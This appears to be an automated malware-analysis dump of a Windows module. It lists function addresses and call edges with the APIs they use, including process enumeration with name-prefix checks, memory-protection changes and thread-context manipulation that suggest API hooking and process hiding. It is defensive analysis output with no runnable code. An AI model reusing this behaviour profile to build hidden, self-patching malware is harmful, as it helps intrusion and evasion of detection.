7563->7566 7567 17d2dd5154a 7563->7567 7564 17d2dd51561 StrCmpIW 7564->7567 7565 17d2dd51569 StrCmpW 7565->7567 7566->7554 7567->7564 7567->7565 7567->7566 7569 17d2dd514e2 GetProcessHeap HeapFree GetProcessHeap HeapFree 7568->7569 7570 17d2dd514c2 GetProcessHeap HeapFree 7568->7570 7570->7569 7570->7570 8010 17d2dd647c2 8019 17d2dd59978 8010->8019 8012 17d2dd64814 __CxxCallCatchBlock 8013 17d2dd59324 _CreateFrameInfo 9 API calls 8012->8013 8015 17d2dd64828 8013->8015 8016 17d2dd59324 _CreateFrameInfo 9 API calls 8015->8016 8018 17d2dd64838 8016->8018 8020 17d2dd59324 _CreateFrameInfo 9 API calls 8019->8020 8021 17d2dd5998a 8020->8021 8022 17d2dd59324 _CreateFrameInfo 9 API calls 8021->8022 8023 17d2dd599c5 8021->8023 8024 17d2dd59995 8022->8024 8024->8023 8025 17d2dd59324 _CreateFrameInfo 9 API calls 8024->8025 8026 17d2dd599b6 8025->8026 8026->8012 8027 17d2dd58ff8 8026->8027 8028 17d2dd59324 _CreateFrameInfo 9 API calls 8027->8028 8029 17d2dd59006 8028->8029 8029->8012 8410 17d2dd5ff40 8411 17d2dd5ff4b 8410->8411 8419 17d2dd62c24 8411->8419 8432 17d2dd5c558 EnterCriticalSection 8419->8432 9195 17d2dd5f440 GetProcessHeap 8030 17d2dd581c0 8031 17d2dd581c9 __scrt_acquire_startup_lock 8030->8031 8033 17d2dd581cd 8031->8033 8034 17d2dd5bbb4 8031->8034 8035 17d2dd5bbd4 8034->8035 8036 17d2dd5bbed 8034->8036 8037 17d2dd5bbf2 8035->8037 8038 17d2dd5bbdc 8035->8038 8036->8033 8039 17d2dd5e864 56 API calls 8037->8039 8040 17d2dd5d1f4 __std_exception_copy 13 API calls 8038->8040 8041 17d2dd5bbf7 8039->8041 8042 17d2dd5bbe1 8040->8042 8066 17d2dd5df38 GetModuleFileNameW 8041->8066 8063 17d2dd5d04c 8042->8063 8050 17d2dd5bc7a 8052 17d2dd5b994 14 API calls 8050->8052 8051 17d2dd5bc69 8053 17d2dd5d1f4 __std_exception_copy 13 API calls 8051->8053 8055 17d2dd5bc96 8052->8055 8062 17d2dd5bc6e 8053->8062 8054 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8054->8036 8056 17d2dd5bcdf 8055->8056 8057 17d2dd5bcc6 8055->8057 8055->8062 8060 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8056->8060 8058 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8057->8058 8059 17d2dd5bccf 8058->8059 8061 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8059->8061 8060->8062 8061->8036 8062->8054 8090 17d2dd5cef8 8063->8090 8067 17d2dd5df91 8066->8067 8068 17d2dd5df7d GetLastError 8066->8068 8070 17d2dd5dd78 14 API calls 8067->8070 8155 17d2dd5d184 8068->8155 8071 17d2dd5dfbf 8070->8071 8076 17d2dd5dfd0 8071->8076 8160 17d2dd5f198 8071->8160 8072 17d2dd5df8a 8073 17d2dd58070 _invalid_parameter_noinfo 8 API calls 8072->8073 8075 17d2dd5bc0e 8073->8075 8078 17d2dd5b994 8075->8078 8164 17d2dd5de1c 8076->8164 8080 17d2dd5b9d2 8078->8080 8082 17d2dd5ba38 8080->8082 8181 17d2dd5ec1c 8080->8181 8081 17d2dd5bb25 8084 17d2dd5bb54 8081->8084 8082->8081 8083 17d2dd5ec1c 14 API calls 8082->8083 8083->8082 8085 17d2dd5bb6c 8084->8085 8089 17d2dd5bba4 8084->8089 8086 17d2dd5d220 __std_exception_copy 13 API calls 8085->8086 8085->8089 8087 17d2dd5bb9a 8086->8087 8088 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8087->8088 8088->8089 8089->8050 8089->8051 8091 17d2dd5cf23 8090->8091 8098 17d2dd5cf94 8091->8098 8093 17d2dd5cf4a 8095 17d2dd5cf6d 8093->8095 8108 17d2dd5c3e0 8093->8108 8096 17d2dd5cf82 8095->8096 8097 17d2dd5c3e0 _invalid_parameter_noinfo 17 API calls 8095->8097 8096->8036 8097->8096 8121 17d2dd5ccc8 8098->8121 8103 17d2dd5cfcf 8103->8093 8109 17d2dd5c3ef GetLastError 8108->8109 8110 17d2dd5c438 8108->8110 8111 17d2dd5c404 8109->8111 8110->8095 8112 17d2dd5cba0 _invalid_parameter_noinfo 14 API calls 8111->8112 8113 17d2dd5c41e SetLastError 8112->8113 8113->8110 8114 17d2dd5c441 8113->8114 8115 17d2dd5c3e0 _invalid_parameter_noinfo 15 API calls 8114->8115 8116 17d2dd5c467 8115->8116 8147 17d2dd5ffe8 8116->8147 8122 17d2dd5cce4 GetLastError 8121->8122 8123 17d2dd5cd1f 8121->8123 8124 17d2dd5ccf4 8122->8124 8123->8103 8127 17d2dd5cd34 8123->8127 8134 17d2dd5cba0 8124->8134 8128 17d2dd5cd50 GetLastError SetLastError 8127->8128 8129 17d2dd5cd68 8127->8129 8128->8129 8129->8103 8130 17d2dd5d06c IsProcessorFeaturePresent 8129->8130 8131 17d2dd5d07f 8130->8131 8139 17d2dd5cd80 8131->8139 8135 17d2dd5cbc8 FlsGetValue 8134->8135 8137 17d2dd5cbc4 8134->8137 8135->8137 8136 17d2dd5cbde SetLastError 8136->8123 8137->8136 8138 17d2dd5c940 __std_exception_copy 13 API calls 8137->8138 8138->8136 8140 17d2dd5cdba _invalid_parameter_noinfo 8139->8140 8141 17d2dd5cde2 RtlCaptureContext RtlLookupFunctionEntry 8140->8141 8142 17d2dd5ce64 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 8141->8142 8143 17d2dd5ce2e RtlVirtualUnwind 8141->8143 8144 17d2dd5ceb6 _invalid_parameter_noinfo 8142->8144 8143->8142 8145 17d2dd58070 _invalid_parameter_noinfo 8 API calls 8144->8145 8146 17d2dd5ced5 GetCurrentProcess TerminateProcess 8145->8146 8148 17d2dd60001 8147->8148 8149 17d2dd5c48f 8147->8149 8148->8149 8150 17d2dd60a40 _invalid_parameter_noinfo 14 API calls 8148->8150 8151 17d2dd60054 8149->8151 8150->8149 8152 17d2dd5c49f 8151->8152 8153 17d2dd6006d 8151->8153 8152->8095 8153->8152 8154 17d2dd5e8c4 _invalid_parameter_noinfo 14 API calls 8153->8154 8154->8152 8178 17d2dd5d1d0 8155->8178 8157 17d2dd5d191 Concurrency::details::SchedulerProxy::DeleteThis 8158 17d2dd5d1f4 __std_exception_copy 13 API calls 8157->8158 8159 17d2dd5d1a1 8158->8159 8159->8072 8161 17d2dd5f1a9 8160->8161 8162 17d2dd5f1ca 8160->8162 8161->8162 8163 17d2dd5ef88 9 API calls 8161->8163 8162->8076 8163->8162 8165 17d2dd5de5b 8164->8165 8167 17d2dd5de40 8164->8167 8166 17d2dd5de60 8165->8166 8168 17d2dd5ece8 WideCharToMultiByte 8165->8168 8166->8167 8171 17d2dd5d1f4 __std_exception_copy 13 API calls 8166->8171 8167->8072 8169 17d2dd5deb7 8168->8169 8169->8166 8170 17d2dd5debe GetLastError 8169->8170 8173 17d2dd5dee9 8169->8173 8172 17d2dd5d184 13 API calls 8170->8172 8171->8167 8174 17d2dd5decb 8172->8174 8175 17d2dd5ece8 WideCharToMultiByte 8173->8175 8176 17d2dd5d1f4 __std_exception_copy 13 API calls 8174->8176 8177 17d2dd5df10 8175->8177 8176->8167 8177->8167 8177->8170 8179 17d2dd5cb10 __std_exception_copy 13 API calls 8178->8179 8180 17d2dd5d1d9 8179->8180 8180->8157 8182 17d2dd5eba8 8181->8182 8183 17d2dd5dd78 14 API calls 8182->8183 8184 17d2dd5ebcc 8183->8184 8184->8080 8185 17d2dd55fcc 8186 17d2dd55fd3 8185->8186 8187 17d2dd56000 VirtualProtect 8186->8187 8189 17d2dd55f10 8186->8189 8188 17d2dd56029 GetLastError 8187->8188 8187->8189 8188->8189 9196 17d2dd5824c 9198 17d2dd58270 __scrt_acquire_startup_lock 9196->9198 9197 17d2dd5b581 9198->9197 9199 17d2dd5cb10 __std_exception_copy 13 API calls 9198->9199 9200 17d2dd5b5aa 9199->9200 9201 17d2dd64848 9204 17d2dd5904c 9201->9204 9205 17d2dd59064 9204->9205 9206 17d2dd59076 9204->9206 9205->9206 9209 17d2dd5906c 9205->9209 9207 17d2dd59324 _CreateFrameInfo 9 API calls 9206->9207 9210 17d2dd5907b 9207->9210 9208 17d2dd59074 9209->9208 9211 17d2dd59324 _CreateFrameInfo 9 API calls 9209->9211 9210->9208 9213 17d2dd59324 _CreateFrameInfo 9 API calls 9210->9213 9212 17d2dd5909b 9211->9212 9214 17d2dd59324 _CreateFrameInfo 9 API calls 9212->9214 9213->9208 9215 17d2dd590a8 9214->9215 9216 17d2dd5c2f4 14 API calls 9215->9216 9217 17d2dd590b1 9216->9217 9218 17d2dd5c2f4 14 API calls 9217->9218 9219 17d2dd590bd 9218->9219 8433 17d2dd5ad48 8434 17d2dd59324 _CreateFrameInfo 9 API calls 8433->8434 8435 17d2dd5ad7d 8434->8435 8436 17d2dd59324 _CreateFrameInfo 9 API calls 8435->8436 8437 17d2dd5ad8b __except_validate_context_record 8436->8437 8438 17d2dd59324 _CreateFrameInfo 9 API calls 8437->8438 8439 17d2dd5adcf 8438->8439 8440 17d2dd59324 _CreateFrameInfo 9 API calls 8439->8440 8441 17d2dd5add8 8440->8441 8442 17d2dd59324 _CreateFrameInfo 9 API calls 8441->8442 8443 17d2dd5ade1 8442->8443 8456 17d2dd5993c 8443->8456 8446 17d2dd59324 _CreateFrameInfo 9 API calls 8447 17d2dd5ae11 __CxxCallCatchBlock 8446->8447 8448 17d2dd59978 __CxxCallCatchBlock 9 API calls 8447->8448 8451 17d2dd5aec2 8448->8451 8449 17d2dd59324 _CreateFrameInfo 9 API calls 8450 17d2dd5aefe 8449->8450 8452 17d2dd59324 _CreateFrameInfo 9 API calls 8450->8452 8454 17d2dd58ff8 __CxxCallCatchBlock 9 API calls 8451->8454 8455 17d2dd5aeeb __CxxCallCatchBlock 8451->8455 8453 17d2dd5af07 8452->8453 8454->8455 8455->8449 8457 17d2dd59324 _CreateFrameInfo 9 API calls 8456->8457 8458 17d2dd5994d 8457->8458 8459 17d2dd59958 8458->8459 8460 17d2dd59324 _CreateFrameInfo 9 API calls 8458->8460 8461 17d2dd59324 _CreateFrameInfo 9 API calls 8459->8461 8460->8459 8462 17d2dd59969 8461->8462 8462->8446 8462->8447 8782 17d2dd58672 8783 17d2dd590c0 __std_exception_copy 38 API calls 8782->8783 8784 17d2dd5869d 8783->8784 8190 17d2dd55974 8191 17d2dd5597a 8190->8191 8202 17d2dd57fa0 8191->8202 8196 17d2dd55a77 8198 17d2dd55bfd 8196->8198 8200 17d2dd559de 8196->8200 8215 17d2dd57b80 8196->8215 8197 17d2dd55cfb 8198->8197 8199 17d2dd55d77 VirtualProtect 8198->8199 8199->8200 8201 17d2dd55da3 GetLastError 8199->8201 8201->8200 8204 17d2dd57fab 8202->8204 8203 17d2dd559bd 8203->8200 8211 17d2dd54400 8203->8211 8204->8203 8205 17d2dd5b470 __std_exception_copy 2 API calls 8204->8205 8206 17d2dd57fca 8204->8206 8205->8204 8210 17d2dd57fd5 8206->8210 8221 17d2dd587b8 8206->8221 8225 17d2dd587d8 8210->8225 8212 17d2dd5441d 8211->8212 8214 17d2dd5448c 8212->8214 8234 17d2dd54670 8212->8234 8214->8196 8216 17d2dd57bc7 8215->8216 8259 17d2dd57950 8216->8259 8219 17d2dd58070 _invalid_parameter_noinfo 8 API calls 8220 17d2dd57bf1 8219->8220 8220->8196 8222 17d2dd587c6 std::bad_alloc::bad_alloc 8221->8222 8229 17d2dd59178 8222->8229 8224 17d2dd587d7 8226 17d2dd587e6 std::bad_alloc::bad_alloc 8225->8226 8227 17d2dd59178 Concurrency::cancel_current_task 2 API calls 8226->8227 8228 17d2dd57fdb 8227->8228 8230 17d2dd59197 8229->8230 8231 17d2dd591e2 RaiseException 8230->8231 8232 17d2dd591c0 RtlPcToFileHeader 8230->8232 8231->8224 8233 17d2dd591d8 8232->8233 8233->8231 8235 17d2dd54694 8234->8235 8236 17d2dd546b7 8234->8236 8235->8236 8248 17d2dd54120 8235->8248 8238 17d2dd546ed 8236->8238 8254 17d2dd54250 8236->8254 8240 17d2dd54250 2 API calls 8238->8240 8241 17d2dd5471d 8238->8241 8240->8241 8242 17d2dd54120 3 API calls 8241->8242 8246 17d2dd54753 8241->8246 8242->8246 8243 17d2dd54120 3 API calls 8245 17d2dd5476f 8243->8245 8244 17d2dd5478b 8244->8214 8245->8244 8247 17d2dd54250 2 API calls 8245->8247 8246->8243 8246->8245 8247->8244 8253 17d2dd54141 8248->8253 8249 17d2dd541b0 8249->8236 8250 17d2dd54196 VirtualQuery 8250->8249 8250->8253 8251 17d2dd541ca VirtualAlloc 8251->8249 8252 17d2dd541fb GetLastError 8251->8252 8252->8253 8253->8249 8253->8250 8253->8251 8255 17d2dd54268 8254->8255 8256 17d2dd542bd VirtualQuery 8255->8256 8257 17d2dd542d7 8255->8257 8258 17d2dd54322 GetLastError 8255->8258 8256->8255 8256->8257 8257->8238 8258->8255 8260 17d2dd5796b 8259->8260 8261 17d2dd57981 SetLastError 8260->8261 8262 17d2dd5798f 8260->8262 8261->8262 8262->8219 8263 17d2dd5f370 VirtualProtect 8785 17d2dd5f870 8786 17d2dd5f8a0 8785->8786 8788 17d2dd5f8c7 8785->8788 8787 17d2dd5cb10 __std_exception_copy 13 API calls 8786->8787 8786->8788 8792 17d2dd5f8b4 8786->8792 8787->8792 8789 17d2dd5f99c 8788->8789 8808 17d2dd5c558 EnterCriticalSection 8788->8808 8793 17d2dd5fab3 8789->8793 8795 17d2dd5fa03 8789->8795 8801 17d2dd5f9ca 8789->8801 8790 17d2dd5f904 8792->8788 8792->8790 8794 17d2dd5f949 8792->8794 8796 17d2dd5fac0 8793->8796 8810 17d2dd5c5ac LeaveCriticalSection 8793->8810 8797 17d2dd5d1f4 __std_exception_copy 13 API calls 8794->8797 8805 17d2dd5fa61 8795->8805 8809 17d2dd5c5ac LeaveCriticalSection 8795->8809 8800 17d2dd5f94e 8797->8800 8802 17d2dd5d04c _invalid_parameter_noinfo 38 API calls 8800->8802 8801->8795 8803 17d2dd5cab0 _invalid_parameter_noinfo 14 API calls 8801->8803 8802->8790 8804 17d2dd5f9f3 8803->8804 8806 17d2dd5cab0 _invalid_parameter_noinfo 14 API calls 8804->8806 8807 17d2dd5cab0 14 API calls _invalid_parameter_noinfo 8805->8807 8806->8795 8807->8805 9220 17d2dd52ff0 9221 17d2dd53061 9220->9221 9222 17d2dd53384 9221->9222 9223 17d2dd5308d GetModuleHandleA 9221->9223 9224 17d2dd530b1 9223->9224 9225 17d2dd5309f GetProcAddress 9223->9225 9224->9222 9226 17d2dd530d8 StrCmpNIW 9224->9226 9225->9224 9226->9222 9232 17d2dd530fd 9226->9232 9227 17d2dd51a30 6 API calls 9227->9232 9228 17d2dd5320f lstrlenW 9228->9232 9229 17d2dd532b9 lstrlenW 9229->9232 9230 17d2dd53f88 StrCmpNIW 9230->9232 9231 17d2dd51cfc StrCmpIW StrCmpW 9231->9232 9232->9222 9232->9227 9232->9228 9232->9229 9232->9230 9232->9231 8811 17d2dd6387c 8812 17d2dd638b4 __GSHandlerCheckCommon 8811->8812 8813 17d2dd638e0 8812->8813 8815 17d2dd59a24 8812->8815 8816 17d2dd59324 _CreateFrameInfo 9 API calls 8815->8816 8817 17d2dd59a4e 8816->8817 8818 17d2dd59324 _CreateFrameInfo 9 API calls 8817->8818 8819 17d2dd59a5b 8818->8819 8820 17d2dd59324 _CreateFrameInfo 9 API calls 8819->8820 8821 17d2dd59a64 8820->8821 8821->8813 9233 17d2dd541f9 9234 17d2dd54146 9233->9234 9235 17d2dd54196 VirtualQuery 9234->9235 9236 17d2dd541b0 9234->9236 9237 17d2dd541ca VirtualAlloc 9234->9237 9235->9234 9235->9236 9237->9236 9238 17d2dd541fb GetLastError 9237->9238 9238->9234 9239 17d2dd55ff9 9240 17d2dd56000 VirtualProtect 9239->9240 9241 17d2dd56029 GetLastError 9240->9241 9242 17d2dd55f10 9240->9242 9241->9242 9243 17d2dd5cbfc 9248 17d2dd5f3a0 9243->9248 9245 17d2dd5cc05 9246 17d2dd5cb10 __std_exception_copy 13 API calls 9245->9246 9247 17d2dd5cc22 __vcrt_uninitialize_ptd 9245->9247 9246->9247 9249 17d2dd5f3b1 9248->9249 9250 17d2dd5f3b5 9248->9250 9249->9245 9250->9249 9251 17d2dd5ef88 9 API calls 9250->9251 9251->9249 8463 17d2dd646f5 8464 17d2dd59324 _CreateFrameInfo 9 API calls 8463->8464 8465 17d2dd6470d 8464->8465 8466 17d2dd59324 _CreateFrameInfo 9 API calls 8465->8466 8467 17d2dd64728 8466->8467 8468 17d2dd59324 _CreateFrameInfo 9 API calls 8467->8468 8469 17d2dd6473c 8468->8469 8470 17d2dd59324 _CreateFrameInfo 9 API calls 8469->8470 8471 17d2dd6477e 8470->8471 9252 17d2dd5f3e4 9253 17d2dd5f41d 9252->9253 9255 17d2dd5f3ee 9252->9255 9254 17d2dd5f403 FreeLibrary 9254->9255 9255->9253 9255->9254 9256 17d2dd633e4 9257 17d2dd633fb 9256->9257 9258 17d2dd633f5 CloseHandle 9256->9258 9258->9257 9259 17d2dd563e3 9260 17d2dd563f0 9259->9260 9261 17d2dd5655a 9260->9261 9262 17d2dd563fc GetThreadContext 9260->9262 9265 17d2dd56581 VirtualProtect FlushInstructionCache 9261->9265 9268 17d2dd5663e 9261->9268 9262->9261 9263 17d2dd56422 9262->9263 9263->9261 9264 17d2dd56449 9263->9264 9266 17d2dd564cd 9264->9266 9271 17d2dd564a6 SetThreadContext 9264->9271 9265->9261 9267 17d2dd5665e 9269 17d2dd55530 3 API calls 9267->9269 9268->9267 9270 17d2dd54b20 VirtualFree 9268->9270 9274 17d2dd56663 9269->9274 9270->9267 9271->9266 9272 17d2dd566b7 9275 17d2dd58070 _invalid_parameter_noinfo 8 API calls 9272->9275 9273 17d2dd56677 ResumeThread 9273->9274 9274->9272 9274->9273 9276 17d2dd566ff 9275->9276 8822 17d2dd6465f 8823 17d2dd64677 8822->8823 8829 17d2dd646e2 8822->8829 8824 17d2dd59324 _CreateFrameInfo 9 API calls 8823->8824 8823->8829 8825 17d2dd646c4 8824->8825 8826 17d2dd59324 _CreateFrameInfo 9 API calls 8825->8826 8827 17d2dd646d9 8826->8827 8828 17d2dd5c2f4 14 API calls 8827->8828 8828->8829 8273 17d2dd63960 8283 17d2dd58ca0 8273->8283 8275 17d2dd63988 8277 17d2dd59324 _CreateFrameInfo 9 API calls 8278 17d2dd63998 8277->8278 8279 17d2dd59324 _CreateFrameInfo 9 API calls 8278->8279 8280 17d2dd639a1 8279->8280 8287 17d2dd5c2f4 8280->8287 8286 17d2dd58cd0 __CxxCallCatchBlock _IsNonwritableInCurrentImage __except_validate_context_record 8283->8286 8284 17d2dd58dd1 8284->8275 8284->8277 8285 17d2dd58d94 RtlUnwindEx 8285->8286 8286->8284 8286->8285 8288 17d2dd5cab0 _invalid_parameter_noinfo 14 API calls 8287->8288 8289 17d2dd5c2fd 8288->8289 8472 17d2dd606e0 8473 17d2dd606e9 8472->8473 8477 17d2dd606f9 8472->8477 8474 17d2dd5d1f4 __std_exception_copy 13 API calls 8473->8474 8475 17d2dd606ee 8474->8475 8476 17d2dd5d04c _invalid_parameter_noinfo 38 API calls 8475->8476 8476->8477 8290 17d2dd57f60 8291 17d2dd57f81 8290->8291 8292 17d2dd57f7c 8290->8292 8294 17d2dd58090 8292->8294 8295 17d2dd580b3 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 8294->8295 8296 17d2dd58127 8294->8296 8295->8296 8296->8291 8830 17d2dd6485e 8831 17d2dd59324 _CreateFrameInfo 9 API calls 8830->8831 8832 17d2dd6486c 8831->8832 8833 17d2dd64877 8832->8833 8834 17d2dd59324 _CreateFrameInfo 9 API calls 8832->8834 8834->8833 9277 17d2dd5b7ea 9278 17d2dd5c2f4 14 API calls 9277->9278 9279 17d2dd5b7ef 9278->9279 9280 17d2dd5b85f 9279->9280 9281 17d2dd5b815 GetModuleHandleW 9279->9281 9294 17d2dd5b6f8 9280->9294 9281->9280 9285 17d2dd5b822 9281->9285 9285->9280 9289 17d2dd5b904 GetModuleHandleExW 9285->9289 9290 17d2dd5b94a 9289->9290 9291 17d2dd5b938 GetProcAddress 9289->9291 9292 17d2dd5b962 9290->9292 9293 17d2dd5b95b FreeLibrary 9290->9293 9291->9290 9292->9280 9293->9292 9306 17d2dd5c558 EnterCriticalSection 9294->9306 9307 17d2dd527e8 9309 17d2dd52867 9307->9309 9308 17d2dd52998 9309->9308 9310 17d2dd528c9 GetFileType 9309->9310 9311 17d2dd528ed 9310->9311 9312 17d2dd528d7 StrCpyW 9310->9312 9314 17d2dd51ad4 4 API calls 9311->9314 9313 17d2dd528fc 9312->9313 9317 17d2dd5299d 9313->9317 9319 17d2dd52906 9313->9319 9314->9313 9315 17d2dd53f88 StrCmpNIW 9315->9317 9316 17d2dd53f88 StrCmpNIW 9316->9319 9317->9308 9317->9315 9318 17d2dd53708 4 API calls 9317->9318 9320 17d2dd51dd4 2 API calls 9317->9320 9318->9317 9319->9308 9319->9316 9321 17d2dd53708 4 API calls 9319->9321 9322 17d2dd51dd4 2 API calls 9319->9322 9320->9317 9321->9319 9322->9319 9323 17d2dd64611 __scrt_dllmain_exception_filter 8835 17d2dd55c8d 8837 17d2dd55c94 8835->8837 8836 17d2dd55cfb 8837->8836 8838 17d2dd55d77 VirtualProtect 8837->8838 8839 17d2dd55db1 8838->8839 8840 17d2dd55da3 GetLastError 8838->8840 8840->8839 8481 17d2dd5c510 8482 17d2dd5c518 8481->8482 8483 17d2dd5c545 8482->8483 8485 17d2dd5c574 8482->8485 8486 17d2dd5c59f 8485->8486 8487 17d2dd5c582 DeleteCriticalSection 8486->8487 8488 17d2dd5c5a3 8486->8488 8487->8486 8488->8483 8297 17d2dd61398 8298 17d2dd613ae 8297->8298 8299 17d2dd613f5 8298->8299 8301 17d2dd6140e 8298->8301 8300 17d2dd5d1f4 __std_exception_copy 13 API calls 8299->8300 8302 17d2dd613fa 8300->8302 8303 17d2dd5dd78 14 API calls 8301->8303 8305 17d2dd61405 8301->8305 8304 17d2dd5d04c _invalid_parameter_noinfo 38 API calls 8302->8304 8303->8305 8304->8305 8489 17d2dd52518 GetProcessIdOfThread GetCurrentProcessId 8490 17d2dd52543 CreateFileW 8489->8490 8491 17d2dd525be 8489->8491 8490->8491 8492 17d2dd52577 WriteFile ReadFile CloseHandle 8490->8492 8492->8491 9324 17d2dd5c218 9325 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9324->9325 9326 17d2dd5c228 9325->9326 9327 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9326->9327 9328 17d2dd5c23c 9327->9328 9329 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9328->9329 9330 17d2dd5c250 9329->9330 9331 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9330->9331 9332 17d2dd5c264 9331->9332 7571 17d2dd52300 NtQuerySystemInformation 7572 17d2dd5233c 7571->7572 7573 17d2dd52355 7572->7573 7574 17d2dd52447 7572->7574 7584 17d2dd52412 7572->7584 7579 17d2dd5238d StrCmpNIW 7573->7579 7582 17d2dd523b4 7573->7582 7573->7584 7575 17d2dd5244c 7574->7575 7576 17d2dd524bb 7574->7576 7591 17d2dd535c8 GetProcessHeap HeapAlloc 7575->7591 7578 17d2dd524c0 7576->7578 7576->7584 7580 17d2dd535c8 11 API calls 7578->7580 7579->7573 7583 17d2dd52464 7580->7583 7582->7573 7585 17d2dd51d30 7582->7585 7583->7584 7586 17d2dd51db4 7585->7586 7587 17d2dd51d57 GetProcessHeap HeapAlloc 7585->7587 7586->7582 7587->7586 7588 17d2dd51d92 7587->7588 7597 17d2dd51cfc 7588->7597 7596 17d2dd5361b 7591->7596 7592 17d2dd536d9 GetProcessHeap HeapFree 7592->7583 7593 17d2dd536d4 7593->7592 7594 17d2dd53666 StrCmpNIW 7594->7596 7595 17d2dd51d30 6 API calls 7595->7596 7596->7592 7596->7593 7596->7594 7596->7595 7598 17d2dd51d13 7597->7598 7599 17d2dd51d1c GetProcessHeap HeapFree 7597->7599 7600 17d2dd51530 2 API calls 7598->7600 7599->7586 7600->7599 8306 17d2dd5c180 8309 17d2dd5bf38 8306->8309 8316 17d2dd5bf00 8309->8316 8317 17d2dd5bf10 8316->8317 8318 17d2dd5bf15 8316->8318 8319 17d2dd5bebc 13 API calls 8317->8319 8320 17d2dd5bf1c 8318->8320 8319->8318 8321 17d2dd5bf31 8320->8321 8322 17d2dd5bf2c 8320->8322 8324 17d2dd5bebc 8321->8324 8323 17d2dd5bebc 13 API calls 8322->8323 8323->8321 8325 17d2dd5bec1 8324->8325 8326 17d2dd5bef2 8324->8326 8327 17d2dd5beea 8325->8327 8328 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8325->8328 8329 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8327->8329 8328->8325 8329->8326 8493 17d2dd5b500 8498 17d2dd5c558 EnterCriticalSection 8493->8498 8499 17d2dd58f0c 8506 17d2dd5946c 8499->8506 8502 17d2dd58f19 8507 17d2dd59474 8506->8507 8509 17d2dd594a5 8507->8509 8510 17d2dd58f15 8507->8510 8523 17d2dd59d28 8507->8523 8511 17d2dd594b4 __vcrt_uninitialize_locks DeleteCriticalSection 8509->8511 8510->8502 8512 17d2dd59400 8510->8512 8511->8510 8528 17d2dd59bfc 8512->8528 8524 17d2dd59aac __vcrt_InitializeCriticalSectionEx 5 API calls 8523->8524 8525 17d2dd59d5e 8524->8525 8526 17d2dd59d73 InitializeCriticalSectionAndSpinCount 8525->8526 8527 17d2dd59d68 8525->8527 8526->8527 8527->8507 8529 17d2dd59aac __vcrt_InitializeCriticalSectionEx 5 API calls 8528->8529 8530 17d2dd59c21 TlsAlloc 8529->8530 9333 17d2dd5820c 9340 17d2dd58f34 9333->9340 9336 17d2dd58219 9341 17d2dd59340 _CreateFrameInfo 9 API calls 9340->9341 9342 17d2dd58215 9341->9342 9342->9336 9343 17d2dd5c288 9342->9343 9344 17d2dd5cb10 __std_exception_copy 13 API calls 9343->9344 9345 17d2dd58222 9344->9345 9345->9336 9346 17d2dd58f48 9345->9346 9349 17d2dd592dc 9346->9349 9348 17d2dd58f51 9348->9336 9350 17d2dd592ed 9349->9350 9351 17d2dd59302 9349->9351 9352 17d2dd59c8c _CreateFrameInfo 6 API calls 9350->9352 9351->9348 9353 17d2dd592f2 9352->9353 9355 17d2dd59cd4 9353->9355 9356 17d2dd59aac __vcrt_InitializeCriticalSectionEx 5 API calls 9355->9356 9357 17d2dd59d02 9356->9357 9358 17d2dd59d14 TlsSetValue 9357->9358 9359 17d2dd59d0c 9357->9359 9358->9359 9359->9351

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 36 17d2dd52300-17d2dd5233a NtQuerySystemInformation 37 17d2dd52343-17d2dd52346 36->37 38 17d2dd5233c-17d2dd52340 36->38 39 17d2dd5234c-17d2dd5234f 37->39 40 17d2dd524f7-17d2dd52517 37->40 38->37 41 17d2dd52355-17d2dd52367 39->41 42 17d2dd52447-17d2dd5244a 39->42 41->40 45 17d2dd5236d-17d2dd52379 41->45 43 17d2dd5244c-17d2dd52466 call 17d2dd535c8 42->43 44 17d2dd524bb-17d2dd524be 42->44 43->40 54 17d2dd5246c-17d2dd52482 43->54 44->40 49 17d2dd524c0-17d2dd524d3 call 17d2dd535c8 44->49 47 17d2dd5237b-17d2dd5238b 45->47 48 17d2dd523a7-17d2dd523b2 call 17d2dd51cc4 45->48 47->48 51 17d2dd5238d-17d2dd523a5 StrCmpNIW 47->51 55 17d2dd523d3-17d2dd523e5 48->55 62 17d2dd523b4-17d2dd523cc call 17d2dd51d30 48->62 49->40 61 17d2dd524d5-17d2dd524dd 49->61 51->48 51->55 54->40 60 17d2dd52484-17d2dd524a0 54->60 58 17d2dd523f5-17d2dd523f7 55->58 59 17d2dd523e7-17d2dd523e9 55->59 66 17d2dd523fe 58->66 67 17d2dd523f9-17d2dd523fc 58->67 64 17d2dd523f0-17d2dd523f3 59->64 65 17d2dd523eb-17d2dd523ee 59->65 68 17d2dd524a4-17d2dd524b7 60->68 61->40 69 17d2dd524df-17d2dd524e7 61->69 62->55 74 17d2dd523ce-17d2dd523d1 62->74 72 17d2dd52401-17d2dd52404 64->72 65->72 66->72 67->72 68->68 73 17d2dd524b9 68->73 70 17d2dd524ea-17d2dd524f5 69->70 70->40 70->70 75 17d2dd52412-17d2dd52415 72->75 76 17d2dd52406-17d2dd5240c 72->76 73->40 74->72 75->40 77 17d2dd5241b-17d2dd5241f 75->77 76->45 76->75 78 17d2dd52421-17d2dd52424 77->78 79 17d2dd52436-17d2dd52442 77->79 78->40 80 17d2dd5242a-17d2dd5242f 78->80 79->40 80->77 81 17d2dd52431 80->81 81->40
                                                  APIs
                                                  • NtQuerySystemInformation.NTDLL ref: 0000017D2DD5232B
                                                  • StrCmpNIW.SHLWAPI ref: 0000017D2DD5239A
                                                    • Part of subcall function 0000017D2DD535C8: GetProcessHeap.KERNEL32(?,?,?,?,?,0000017D2DD524D1), ref: 0000017D2DD535EB
